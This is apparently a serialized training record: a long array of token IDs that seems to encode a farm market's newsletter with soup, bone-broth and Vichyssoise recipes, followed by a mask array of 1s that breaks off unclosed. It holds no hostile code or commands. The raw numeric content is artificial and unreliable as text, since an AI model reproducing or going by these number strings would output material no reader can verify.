1612, 2654, 3104, 1219, 470, 14225, 3104, 1219, 304, 5186, 1048, 29871, 29896, 18002, 3060, 2986, 13, 13, 4035, 303, 12356, 322, 788, 738, 12461, 366, 763, 29991, 9243, 352, 361, 13609, 29973, 4358, 617, 5079, 29973, 317, 339, 1161, 29973, 13, 13, 29906, 885, 497, 1080, 29892, 3060, 2986, 13, 13, 29928, 1253, 292, 313, 29896, 29889, 29945, 2723, 567, 1125, 13, 13, 29896, 7075, 341, 1479, 1242, 19710, 13, 13, 29906, 19018, 652, 13022, 1818, 538, 13, 13, 29941, 19018, 274, 1241, 13848, 387, 279, 13, 13, 29896, 19018, 6432, 708, 16717, 313, 29902, 1304, 1034, 29875, 3825, 29892, 5962, 411, 263, 5758, 279, 322, 282, 342, 280, 29897, 13, 13, 29941, 29914, 29946, 18002, 288, 9258, 17182, 13, 13, 29879, 1997, 322, 1236, 2496, 304, 21779, 13, 13, 1523, 26062, 278, 19710, 29892, 1818, 538, 29892, 13848, 387, 279, 322, 6432, 708, 29914, 2616, 29875, 3825, 297, 263, 24907, 12580, 29880, 29889, 5806, 377, 3873, 292, 21003, 313, 1552, 377, 3873, 26305, 373, 590, 5198, 4455, 1999, 1581, 338, 2107, 363, 445, 29897, 14205, 788, 278, 17182, 2745, 278, 10714, 292, 338, 12003, 29889, 27903, 322, 1236, 2496, 304, 21779, 29889, 13, 13, 8431, 309, 3307, 4094, 304, 4612, 18655, 1849, 470, 304, 664, 411, 596, 16389, 1886, 11500, 1158, 29889, 13, 13, 29907, 14044, 322, 521, 459, 596, 18655, 1849, 322, 788, 963, 297, 1797, 310, 7984, 292, 931, 29899, 3104, 20452, 937, 29892, 769, 1559, 307, 1372, 29892, 1771, 1558, 1379, 7689, 17718, 472, 278, 1833, 11015, 577, 896, 7952, 2181, 3322, 29891, 29991, 13, 13, 29928, 6038, 322, 2058, 278, 18655, 1849, 297, 596, 16330, 270, 728, 29898, 267, 29897, 322, 1671, 408, 1568, 10714, 292, 408, 366, 763, 975, 372, 29889, 16913, 738, 4805, 297, 278, 1424, 5525, 363, 701, 304, 263, 4723, 29889, 402, 2753, 728, 411, 3060, 2986, 885, 497, 1080, 322, 9080, 29991, 13, 13, 10454, 393, 591, 30010, 276, 18055, 278, 521, 9403, 4259, 29892, 1784, 9999, 20330, 505, 1063, 6721, 565, 591, 30010, 645, 19417, 2545, 386, 1449, 445, 1629, 29889, 1334, 9251, 5239, 263, 2545, 386, 1754, 515, 1749, 367, 1389, 322, 7013, 1989, 289, 2873, 29899, 372, 1122, 3447, 337, 932, 799, 29991, 512, 278, 6839, 603, 29892, 1244, 30010, 29879, 590, 6996, 367, 1389, 289, 650, 2545, 386, 9522, 412, 29901, 13, 13, 9842, 29901, 960, 366, 1016, 30010, 29873, 505, 263, 5232, 7984, 261, 29892, 263, 3104, 373, 278, 380, 994, 674, 437, 322, 29871, 29946, 6199, 674, 679, 366, 263, 7575, 2545, 386, 29889, 450, 5520, 1886, 1022, 931, 454, 14520, 901, 1375, 261, 1338, 515, 278, 289, 2873, 322, 29867, 304, 1121, 297, 263, 901, 9127, 21203, 681, 2545, 386, 29889, 13, 13, 29909, 4559, 310, 1749, 367, 1389, 22300, 289, 2873, 29899, 1269, 4870, 338, 1422, 29892, 4049, 777, 889, 2707, 793, 322, 784, 11541, 8261, 12785, 411, 263, 2217, 27654, 373, 963, 29889, 13, 13, 27407, 288, 854, 304, 29871, 29941, 29945, 29900, 29943, 322, 1369, 263, 413, 1803, 280, 310, 4094, 1045, 6504, 29889, 13, 13, 1433, 3881, 367, 1389, 289, 2873, 297, 263, 10772, 276, 29916, 289, 5086, 270, 728, 393, 674, 4808, 963, 411, 263, 2217, 5716, 304, 29337, 13, 13, 2308, 326, 313, 272, 451, 29897, 322, 12616, 263, 2919, 373, 291, 322, 1921, 372, 411, 17184, 1960, 313, 4149, 15373, 467, 826, 3881, 372, 2820, 278, 367, 1389, 9978, 297, 278, 289, 5086, 270, 728, 29889, 13, 13, 12310, 278, 3353, 1183, 29890, 574, 297, 278, 288, 854, 363, 2820, 29871, 29941, 29900, 1375, 29892, 2745, 278, 12770, 310, 2712, 1106, 3347, 9571, 29889, 13, 13, 15941, 515, 288, 854, 322, 7389, 3587, 433, 911, 773, 278, 19006, 470, 13848, 387, 279, 313, 347, 1671, 372, 964, 29914, 957, 278, 289, 2873, 322, 528, 1296, 2712, 263, 2586, 467, 13, 13, 4421, 336, 412, 4129, 3704, 278, 10771, 9978, 297, 278, 5970, 310, 278, 289, 5086, 270, 728, 964, 596, 5232, 7984, 261, 313, 24669, 338, 925, 263, 29871, 29946, 3855, 29873, 29892, 29871, 29945, 3855, 29873, 723, 367, 263, 2217, 2253, 29897, 322, 4612, 411, 278, 1045, 2356, 4094, 29889, 13, 13, 29933, 5393, 304, 263, 1045, 309, 29914, 303, 1479, 29891, 289, 431, 21435, 373, 1880, 322, 769, 2507, 596, 5232, 7984, 261, 304, 4482, 363, 1048, 29871, 29906, 29946, 6199, 29889, 13, 13, 27407, 5232, 7984, 261, 1283, 322, 1235, 12528, 263, 2586, 577, 372, 30010, 29879, 6775, 304, 4386, 29889, 15484, 263, 5312, 4983, 2919, 3307, 304, 4808, 278, 289, 2873, 975, 263, 11451, 276, 29916, 470, 11915, 12580, 29880, 2919, 3307, 363, 278, 23904, 322, 1671, 8118, 310, 5232, 7984, 261, 1549, 29889, 1383, 1296, 278, 5312, 4983, 263, 2586, 304, 679, 599, 278, 23904, 714, 29889, 3295, 7543, 278, 1083, 29876, 1934, 29889, 13, 13, 29907, 957, 322, 1235, 278, 2545, 386, 12528, 29892, 769, 2058, 297, 278, 1424, 5525, 2745, 738, 9950, 756, 7773, 2164, 373, 2246, 29892, 263, 2846, 6199, 29889, 3439, 17632, 26755, 322, 544, 29891, 701, 278, 9950, 29892, 885, 2390, 292, 2545, 386, 1283, 278, 23400, 680, 29892, 322, 23986, 372, 363, 7984, 292, 411, 313, 29902, 3013, 7903, 14671, 2256, 20198, 13, 13, 8498, 2548, 373, 278, 9853, 310, 289, 2873, 29892, 596, 2545, 386, 1122, 367, 10579, 470, 1407, 432, 335, 16808, 313, 4149, 263, 4559, 2400, 20198, 20370, 885, 26793, 470, 1671, 964, 7968, 22637, 470, 14890, 28704, 260, 764, 29879, 29892, 337, 1341, 4087, 403, 363, 701, 304, 697, 4723, 470, 3889, 911, 29889, 1174, 2212, 29891, 29991, 13, 13, 5262, 29958, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 915, 1389, 29899, 15933, 29899, 6729, 386, 29899, 4361, 412, 29914, 18798, 29914, 29900, 29953, 29900, 29929, 29953, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29895, 23213, 29914, 915, 1389, 29899, 15933, 29899, 6729, 386, 29899, 4361, 412, 29914, 3112, 30010, 29879, 278, 1570, 342, 1605, 355, 29901, 11095, 13329, 478, 436, 952, 578, 895, 29991, 1124, 597, 18798, 14701, 29889, 3608, 29889, 510, 24629, 29878, 29914, 3844, 389, 1004, 23626, 24629, 29941, 29914, 29956, 29963, 29967, 29874, 29967, 29955, 29878, 29906, 29967, 29955, 29946, 29914, 13, 1124, 597, 3844, 389, 1004, 23626, 29889, 510, 29914, 29888, 2817, 29914, 1169, 29899, 1552, 29899, 1482, 342, 29899, 509, 355, 29899, 799, 368, 29899, 2083, 1050, 29899, 29894, 436, 952, 578, 895, 8484, 3636, 27034, 29892, 29871, 29906, 29946, 8378, 29871, 29906, 29900, 29896, 29953, 29871, 29896, 29900, 29901, 29941, 29941, 29901, 29900, 29896, 718, 29900, 29900, 29900, 29900, 1124, 597, 1482, 29889, 3844, 389, 1004, 23626, 29889, 510, 13401, 29886, 29922, 29945, 29929, 29947, 29947, 29908, 29209, 341, 1479, 1242, 669, 7075, 2671, 23354, 29892, 21771, 3529, 17794, 10307, 5281, 297, 263, 2215, 4056, 7881, 338, 263, 2217, 1422, 1135, 278, 7604, 1702, 311, 310, 534, 355, 731, 2153, 393, 19450, 1784, 310, 278, 2215, 13269, 2791, 1691, 7075, 341, 1479, 1242, 1098, 1975, 29889, 1551, 12125, 1036, 472, 278, 17888, 278, 1409, 310, 2927, 1319, 2305, 322, 1009, 2130, 3842, 526, 8611, 491, 278, 1750, 1308, 8536, 12184, 310, 825, 29915, 29879, 297, 278, 21945, 13, 13, 6295, 1455, 5281, 297, 263, 2215, 4056, 7881, 338, 263, 2217, 1422, 1135, 278, 7604, 1702, 311, 310, 534, 355, 731, 2153, 393, 19450, 1784, 310, 278, 2215, 13269, 2791, 1691, 7075, 341, 1479, 1242, 1098, 1975, 29889, 1551, 12125, 1036, 472, 278, 17888, 278, 1409, 310, 2927, 1319, 2305, 322, 1009, 2130, 3842, 526, 8611, 491, 278, 1750, 1308, 8536, 12184, 310, 825, 30010, 29879, 297, 278, 4235, 29889, 450, 9892, 357, 310, 4723, 355, 528, 9354, 414, 338, 286, 3860, 29889, 23354, 414, 322, 7984, 29879, 378, 3901, 373, 920, 304, 14240, 445, 8536, 12184, 964, 9128, 322, 11643, 5996, 480, 3510, 749, 363, 278, 1494, 4723, 355, 29889, 13, 13, 30015, 29925, 327, 282, 583, 3282, 30010, 29873, 19417, 393, 1532, 445, 4723, 355, 29889, 306, 1348, 278, 4259, 338, 975, 29889, 1938, 366, 864, 304, 788, 11220, 1375, 16444, 650, 304, 278, 1051, 363, 445, 4723, 6677, 13, 13, 30015, 3492, 30010, 276, 1492, 29889, 306, 30010, 645, 1426, 28548, 1056, 322, 1074, 825, 30010, 29879, 3625, 29889, 796, 1682, 305, 2172, 1795, 367, 297, 29892, 541, 727, 526, 694, 6454, 20452, 3447, 322, 373, 1080, 526, 1603, 2319, 3178, 13, 13, 18567, 28548, 1056, 29892, 306, 5131, 304, 1797, 2348, 1127, 10070, 363, 1375, 16444, 650, 29889, 306, 1073, 372, 30010, 29879, 263, 1472, 10322, 29892, 541, 1235, 592, 1073, 825, 366, 505, 322, 306, 508, 12464, 272, 278, 9522, 412, 29889, 13, 13, 13555, 385, 7234, 470, 577, 310, 5650, 1287, 29892, 306, 2507, 304, 590, 9008, 304, 1074, 825, 24132, 12321, 23354, 30010, 29879, 12271, 29892, 28548, 1056, 29892, 756, 2665, 297, 8908, 29889, 13, 13, 18420, 3879, 1076, 24190, 29892, 306, 505, 373, 1080, 541, 896, 526, 278, 2159, 310, 29416, 26563, 29889, 796, 2679, 267, 322, 6454, 20452, 526, 925, 6421, 297, 29892, 541, 306, 437, 505, 7776, 17807, 29892, 2545, 617, 5079, 29892, 285, 2108, 295, 29892, 413, 744, 29892, 5321, 3163, 322, 4497, 328, 2507, 4512, 29889, 13, 13, 12024, 592, 1348, 373, 1906, 322, 679, 1250, 304, 366, 2678, 9826, 29889, 1834, 29991, 13, 13, 27407, 4512, 29892, 13435, 3163, 322, 383, 2108, 295, 29892, 438, 29950, 19519, 29991, 13, 13, 29902, 763, 5321, 3163, 29892, 2507, 4512, 322, 285, 2108, 295, 29892, 541, 2805, 534, 355, 731, 2153, 304, 1018, 963, 338, 18066, 292, 29889, 1128, 437, 366, 14405, 18254, 29878, 17658, 20619, 29892, 4482, 1208, 7661, 29892, 2894, 293, 7738, 964, 10977, 274, 13910, 363, 278, 3186, 591, 653, 9999, 17394, 2496, 29973, 306, 12561, 310, 1554, 393, 14332, 297, 590, 3699, 723, 17545, 29889, 739, 4225, 304, 1207, 278, 2462, 6775, 363, 263, 19587, 16823, 411, 1568, 901, 373, 590, 304, 437, 1051, 1135, 17803, 29889, 512, 445, 982, 29892, 278, 2215, 4056, 7881, 338, 694, 1422, 1135, 738, 916, 2318, 310, 16157, 29879, 29889, 1619, 1487, 723, 451, 6023, 5321, 3163, 373, 1009, 1914, 29889, 306, 1898, 1045, 2356, 2507, 4512, 2748, 322, 5429, 1075, 896, 892, 4796, 367, 1691, 29889, 940, 471, 2211, 322, 1603, 1083, 13415, 372, 29889, 383, 2108, 295, 260, 579, 267, 2086, 1568, 763, 7794, 272, 625, 363, 590, 10216, 29892, 607, 2360, 8465, 304, 2358, 682, 280, 670, 26414, 29889, 323, 820, 19174, 472, 590, 3699, 29899, 451, 25531, 2215, 13269, 9999, 528, 9354, 414, 29889, 13, 13, 5618, 304, 437, 29973, 1128, 1048, 478, 436, 952, 578, 895, 29973, 739, 30010, 29879, 907, 25934, 29892, 372, 20789, 541, 357, 29892, 372, 508, 367, 321, 2579, 11220, 322, 372, 5771, 1532, 411, 3710, 273, 3922, 470, 696, 28470, 872, 21125, 29889, 2567, 920, 437, 306, 1207, 445, 411, 2507, 4512, 29892, 285, 2108, 295, 322, 5321, 3163, 408, 278, 1667, 2348, 1127, 10070, 29889, 306, 30010, 29885, 451, 1854, 3447, 29892, 541, 306, 2058, 590, 1797, 411, 24132, 12321, 363, 590, 1302, 29899, 24602, 304, 5839, 701, 373, 902, 982, 304, 1749, 17888, 29889, 13, 13, 27501, 423, 10517, 29879, 29899, 1346, 6730, 366, 2125, 278, 2507, 666, 30098, 30024, 13, 13, 29902, 505, 263, 9796, 3370, 310, 478, 436, 952, 578, 895, 29889, 3118, 310, 590, 1900, 5121, 30010, 29879, 6766, 372, 472, 902, 1506, 23670, 1510, 261, 29889, 739, 7091, 269, 3021, 4695, 630, 304, 17545, 1554, 591, 750, 2337, 1754, 2090, 310, 408, 4344, 363, 967, 8177, 12906, 681, 6047, 29889, 1094, 4123, 16157, 29879, 591, 2714, 29892, 1346, 3421, 29892, 920, 2215, 591, 30010, 345, 2041, 29889, 2803, 502, 17545, 478, 436, 952, 578, 895, 8530, 739, 30010, 29879, 8830, 11220, 3104, 1219, 22300, 393, 30010, 29879, 2989, 310, 373, 1080, 29892, 454, 14541, 29892, 322, 907, 314, 29889, 1094, 306, 2740, 1549, 21869, 11563, 29892, 25453, 29871, 29945, 29906, 322, 19509, 411, 27637, 6096, 414, 30010, 5164, 7697, 2187, 29892, 306, 3604, 280, 373, 1554, 393, 23994, 825, 306, 505, 373, 590, 29181, 1591, 29889, 306, 2125, 278, 1880, 2507, 666, 11959, 515, 21869, 11563, 29892, 2143, 457, 372, 411, 278, 541, 357, 310, 25453, 29871, 29945, 29906, 29892, 805, 625, 372, 701, 411, 278, 18254, 29885, 387, 669, 274, 388, 4584, 310, 19509, 411, 27637, 6096, 414, 322, 788, 590, 1914, 7243, 1829, 29889, 306, 884, 1106, 472, 22045, 10517, 30010, 29879, 9522, 412, 363, 10173, 482, 3479, 315, 1253, 265, 363, 1781, 5645, 29889, 1128, 947, 372, 21779, 29973, 1619, 5381, 18096, 30010, 29879, 2933, 25470, 372, 701, 30098, 13, 13, 30015, 3112, 30010, 29879, 1781, 29889, 739, 30010, 29879, 1407, 12601, 29889, 306, 763, 372, 3178, 13, 13, 30015, 2369, 820, 12871, 6677, 13, 13, 30015, 8241, 29991, 306, 1348, 372, 674, 21779, 1584, 2253, 11220, 3178, 13, 13, 13555, 5183, 7870, 1704, 1171, 30010, 29879, 25483, 1319, 4274, 297, 278, 7660, 4918, 29892, 408, 1532, 408, 278, 6374, 6589, 515, 1749, 28108, 20330, 29892, 306, 7091, 306, 750, 304, 437, 1554, 716, 445, 4723, 29889, 739, 30010, 29879, 451, 304, 3113, 278, 534, 355, 731, 2153, 470, 1653, 263, 716, 301, 7004, 1508, 7348, 29889, 739, 30010, 29879, 1363, 3104, 5036, 4259, 471, 975, 29889, 739, 30010, 29879, 1363, 2507, 4512, 29892, 5321, 3163, 322, 285, 2108, 295, 526, 297, 715, 296, 6845, 11421, 411, 278, 12461, 12053, 2215, 1050, 306, 5193, 304, 1432, 4723, 29889, 5853, 4100, 368, 29892, 372, 30010, 29879, 1363, 306, 864, 1554, 393, 723, 664, 411, 590, 19587, 322, 5839, 29891, 3942, 29889, 13, 13, 8893, 292, 7881, 338, 901, 1135, 6445, 701, 373, 263, 24211, 297, 596, 716, 11982, 1338, 322, 6575, 2455, 29889, 739, 30010, 29879, 3907, 1554, 664, 411, 825, 366, 505, 2820, 366, 29889, 306, 505, 278, 1781, 19717, 310, 2534, 21863, 292, 2215, 13269, 29892, 19965, 488, 2982, 322, 13052, 296, 20330, 29889, 910, 338, 2020, 306, 1207, 11095, 13329, 478, 436, 952, 578, 895, 29889, 3967, 372, 29991, 887, 30010, 645, 5360, 372, 322, 1423, 714, 825, 1683, 591, 505, 445, 4723, 515, 1749, 29181, 29991, 13, 13, 29933, 5393, 263, 2919, 3104, 310, 4094, 304, 1045, 309, 322, 788, 29871, 29906, 2319, 1361, 1319, 29879, 310, 15795, 29889, 399, 1161, 322, 521, 459, 278, 413, 744, 964, 18130, 29890, 787, 278, 1021, 2920, 408, 278, 3500, 538, 1808, 29889, 12065, 278, 380, 1567, 17786, 29889, 15484, 278, 872, 329, 29948, 287, 373, 1080, 29892, 696, 28470, 282, 391, 496, 2363, 29892, 454, 3712, 3623, 625, 29892, 454, 3712, 503, 342, 29892, 29871, 29906, 323, 29933, 5550, 29903, 288, 9258, 17182, 29892, 15795, 322, 413, 744, 380, 1567, 964, 263, 9687, 21433, 29889, 678, 459, 2745, 366, 679, 263, 19875, 29891, 5718, 3819, 393, 480, 1169, 596, 5112, 403, 29889, 13, 13, 26222, 278, 4094, 5304, 304, 263, 1045, 309, 29892, 3183, 278, 413, 744, 297, 937, 29889, 20340, 29871, 29896, 29945, 29899, 29941, 29900, 6923, 29889, 3462, 278, 3500, 538, 1808, 29889, 17278, 363, 1023, 6233, 29889, 360, 6038, 278, 4940, 29874, 29889, 323, 2209, 411, 278, 282, 391, 496, 601, 282, 4778, 322, 278, 907, 314, 470, 901, 288, 9258, 17182, 29889, 960, 372, 338, 2086, 15589, 29892, 788, 278, 2545, 386, 470, 21676, 4940, 29874, 4094, 29889, 14314, 682, 280, 411, 2181, 15392, 2654, 1236, 2496, 322, 29914, 272, 26755, 287, 317, 12357, 12323, 1236, 2496, 322, 10849, 368, 867, 630, 610, 4467, 273, 923, 968, 29889, 13, 13, 1748, 345, 411, 263, 12917, 310, 521, 538, 3409, 388, 322, 1101, 701, 411, 263, 13851, 4497, 328, 310, 1395, 575, 29892, 285, 2108, 295, 29892, 2646, 412, 29888, 9216, 322, 288, 9258, 17182, 29991 ]
[ 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 